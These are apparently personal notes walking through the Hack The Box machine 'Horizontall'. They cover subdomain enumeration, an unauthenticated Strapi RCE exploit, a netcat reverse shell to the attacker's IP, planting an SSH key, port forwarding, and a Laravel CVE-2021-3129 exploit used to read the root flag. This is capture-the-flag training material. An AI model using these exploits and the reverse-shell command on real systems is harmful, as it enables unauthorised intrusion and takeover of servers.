vi /etc/hosts
10.10.11.105 horizontall.htb

* Enumeration
nmap -sSVC -vv horizontall.htb

scan subdomain vs dns
gobuster dns -d horizontall.htb -w /usr/share/SecLists/Discovery/DNS/namelist.txt
--->not find subdomain

Scan vhost
gobuster vhost -u horizontall.htb -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt --threads 50
---> api-prod.horizontall.htb

i try 
ffuf -w subdomains.txt -u http://horizontall.htb -H “Host: FUZZ.horizontal.htb”
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://horizontall.htb -H "Host: FUZZ" -fs 4242
---> not find out subdomain or vhost

vi /etc/hosts
10.10.11.105 horizontall.htb api-prod.horizontall.htb


Next search sub directory
ffuf -u http://api-prod.horizontall.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://api-prod.horizontall.htb/ -w /usr/share/wordlists/dirb/common.txt

This gives us 3 entries:
/admin (Login page but we need credentials.)
/reviews (Shows us some reviews and some usernames.)
/users (403 Forbidden)

run http://api-prod.horizontall.htb/admin
On /admin endpoint we see the server is running Strapi, which is an Headless Node.js CMS.

*PRIVILEGE
searchsploit strapi 

Strapi 3.0.0-beta - Set Password (Unauthenticated)                                                                   | multiple/webapps/50237.py
Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)                                                 | multiple/webapps/50238.py
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)                                           | multiple/webapps/50239.py

searchsploit multiple/webapps/50239.py
mv 50239.py exploit.py

python3 exploit.py http://api-prod.horizontall.htb/
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit


[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjM0MDI4ODIwLCJleHAiOjE2MzY2MjA4MjB9.H4xfDwLg5XMEp_2gtE83YP9rke9-lJG0GLMCQ-AvqN8


$> ls
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
{"statusCode":400,"error":"Bad Request","message":[{"messages":[{"id":"An error occurred"}]}]}

$> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.29 3535 > /tmp/f

[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
<html>
<head><title>504 Gateway Time-out</title></head>
<body bgcolor="white">
<center><h1>504 Gateway Time-out</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>
</body>
</html>

$> 

on my local
nc -lnvp 3535

cat /home/developer/user.txt
2bf1e927bf99e214bce9029f87e8e640

netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:1337          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22 

curl -X GET -vv http://localhost:8000

....
Laravel v8 (PHP v7.4.18)

on victim
cd /opt/strapi
mkdir .ssh
wget myip:8000/id_rsa.pub 
mv id_rsa.pub authorized_keys


ssh -i ~/.ssh/id_rsa -L 8000:127.0.0.1:8000 strapi@horizontall.htb

https://github.com/nth347/CVE-2021-3129_exploit
$ git clone https://github.com/nth347/CVE-2021-3129_exploit.git
$ cd CVE-2021-3129_exploit
$ chmod +x exploit.py
$ ./exploit.py http://localhost:8000 Monolog/RCE1 id
$./exploit.py http://localhost:8000 Monolog/RCE1 "cat /root/root.txt"
59ca7bfeebd4d4ae07f0874b51cd64ac

https://burakozlu.medium.com/horizontall-walkthrough-htb-250182ab0721
https://0xandrea.medium.com/horizontall-htb-machine-write-up-67e566f3f7ea
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md


